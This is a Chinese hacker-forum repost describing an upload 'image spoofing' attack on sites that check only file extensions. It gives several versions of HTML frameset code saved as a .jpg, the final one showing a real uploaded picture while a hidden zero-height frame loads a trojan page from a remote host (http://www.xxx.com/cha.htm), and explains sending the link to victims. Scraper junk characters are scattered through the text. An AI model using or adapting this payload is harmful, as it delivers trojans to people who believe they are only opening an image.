QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2411|回复: 0
打印 上一主题 下一主题

站内上传脚本图片欺骗式攻击

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-4 12:01 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

作者:随爱飞翔 转自黑基bbs原创作品版

! |( A; K- w% `0 b" @/ _. P" L

版权归黑客基地所有, 转载请注明出处

- M* v, W& c; h+ C) V1 z

站内上传脚本图片欺骗式攻击 1 k0 j# r# Y% P" G & E$ k( [8 r& O* Z! x7 d注释:这个漏洞适用于所有只检查上传文件格式的程序; B- e& }7 h2 c2 @" k p$ D# K# V" o) [7 T' J测试过程: 其实很早前我就做过这个的教程 可能很少人看过 因为没发过 就是 / F) a4 w" o7 `8 Z( o* E 5 P/ K4 a& K& n2 ]2 k6 g+ ~另外的一个动网跨站攻击 把图片改成HTML代码 上传后可执行 做转向 (其实很1 S9 t8 t5 W3 V. r8 p' O- N 3 g" D* p4 L' ]9 k 多人都知道了) 发现的过程是在我今天无聊 看了一下某大黑客网站哦 BBS上4 h' ^2 x5 S) _; A6 I0 X) U4 i6 n $ X5 R/ T* ~3 X. c- j5 Y# O 做了过滤 上传失败 然后回到主页上 是动力系统 于是注册了一个帐号 然后到6 K) A: v M7 ~; M 7 D; p$ }. h* m' m& ?8 p 个人管理里 看到添加文章里面 能上传 文件 于是 开始想利用的过程 我开始的, }( A5 j0 w" J& C , D) Z, d) G7 n- ]: y1 U- @ 构思是 直接上传这样一个程序 。 但是 其实这样有很大一个漏洞 别人打开这 ; Y: s, O. R1 t/ o: D; I 6 k! p# N+ ^5 `' ]! l* [个JPG网页后 图片显示不出来 自然别人就会起疑心 想到了前段时间一个CHM网; _7 K4 N$ i4 {8 \2 r7 ?- Q: L+ c , J6 v( }/ }% l R7 I( ` 页木马的制作 变相的利用它 其实应该能达到的 假如代码为' h* U6 |; _ Y8 p3 @ <frameset rows="444,0" cols="*">. p$ X- _, Q2 d <frame src="index.htm" framborder="no" scrolling="auto" noresize ) Z) p' \3 e2 D # P- L9 S9 _5 u9 rmarginwidth="0" margingheight="0"> 7 X2 n, i0 ~! `1 @$ l<frame src="cha.htm" frameborder="no" scrolling="no" noresize 8 n) p: U) p% }* @% ^" [% X' I( A }# C; V: O' ? marginwidth="0" margingheight="0">7 ^: p, G, p! r( ? </frameset>- q8 }4 X7 x6 }( @# C 这样的一个index.htm 上传后发现失败 。 直接显示原代码 。。 于是在代 8 S& D# ]0 Z. r0 L1 L, Y7 b) |3 F& r" A1 O 码的开头结尾加了$ K* Y. _9 H6 ~8 K: S1 l <html>4 v& \7 X+ ?- z <frameset rows="444,0" cols="*">2 L9 g7 L! M) E <frame src="index.htm" framborder="no" scrolling="auto" noresize 0 I' d( N# |& f; M, _6 z5 j- q' x7 I$ N marginwidth="0" margingheight="0"> + y: I4 I; G% }+ }- R8 Y' o<frame src="cha.htm" frameborder="no" scrolling="no" noresize 7 w; p8 N, S. z: {* d% q7 B1 S % O" |- Q v, P( N! n, Cmarginwidth="0" margingheight="0"># K1 O, I( b& V: I9 L; B7 N </frameset></html>, J2 I* a, g, h* {6 x 测试后页面已经成了一个木马页面 ( [+ _2 ^$ J) _4 |! ]( A4 |但是这个木马一定要有个CHM的 人家网站不可能专门提供你上传这个类型的文件 # p7 W8 P3 e5 A; D + ^2 D1 O' v; w! ^于是想到远程的调用 后把index.jpg改为代码 0 o& Y( m. y- A' ?% o2 j<html>7 v, k% h; u: O/ [: E <frameset rows="444,0" cols="*"> g! F# C* F# D$ G3 X' l3 P<frame src="index.htm" framborder="no" scrolling="auto" noresize $ t5 }. T- b2 |5 i# }7 y# X 3 t+ \2 }) j; D4 smarginwidth="0" margingheight="0">' C$ C, v2 E K <frame src="http://www.xxx.com/cha.htm" frameborder="no" " }0 \- O D) g/ {' q: s3 M f' B scrolling="no" noresize marginwidth="0" margingheight="0"> ( Q/ r. V3 [+ }0 \6 M# F</frameset></html>+ e7 N6 u5 f4 @ 上传后发现 防火墙成功提示病毒 但是 别人打开这个页面的时候直接是大红XX % Q( n9 I8 {6 [8 b+ I M5 B, h, g: t! w/ N8 j 是个有脑子的人都会怀疑的啊 于是想到把这个页面打开后看成一个图片 接着 ; r% C- p7 k8 Q. k2 |( D! b ) }0 n. i W4 C0 N直接把上面的代码改成+ d( q* S6 S' r+ h4 m <html> ) J' p( A: n& V9 g7 i<frameset rows="444,0" cols="*">& Q( b: g1 p4 t <frame src="/UpLoadFiles/NewsPhoto/omasuiai.jpg" framborder="no" 1 ]8 K; Q/ e1 @1 S 2 S/ l: G) l" j! oscrolling="auto" noresize marginwidth="0" margingheight="0"> " p% a3 E2 C& q( o- a9 j1 P<frame src="http://www.xxx.com/cha.htm" frameborder="no" " z: z0 D ^3 F( ?0 C: H 0 K4 \ B% W) U/ J: B* g# ?1 bscrolling="no" noresize marginwidth="0" margingheight="0"> ; ^8 _) t: c. G# L& l9 k5 ]# `9 b4 S</frameset></html> 2 k8 u* U3 A) U8 N这样打开这个页面的时候正常显示图片 木马也能中了 ( W' L5 V6 W2 D" g前提是要把这个图片页面发给别人 例如 ; ?! b8 a. L& l/UpLoadFiles/NewsPhoto/08aXXXXX.jpg8 \, a3 n, f' ]5 ~ 对方打开后还以为是看到了一张图片 其实他已经中木马了 再怎么说这个也是上 6 q1 K; R( M4 r7 y- p/ t6 I6 [, J5 l! V+ C' [4 t- E$ }$ L 传的图片 而且可能上传到自己的站里 不会有人怀疑的/ [ x, z1 J1 k, [* B4 U! u . Z/ z& g/ _- {3 J' \后记:同上也能在网页上做些其他更恶劣的事情 .. 偶就不举例子了 漏洞不大 & A. {4 C3 @- Y4 T0 I& C* k" ]. H7 K " T: T2 o9 C8 g+ k: r利用价值广泛 各网站管理员开始补漏洞吧 呵呵。。。+ Z* C0 v0 W* O3 O 感谢ICOOL大美女的帮助和测试 1 S/ Q) G- G X8 G( G 也能希望大家多交流 随爱飞翔 QQ :76112846

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-6-11 01:57 , Processed in 0.632794 second(s), 52 queries .

回顶部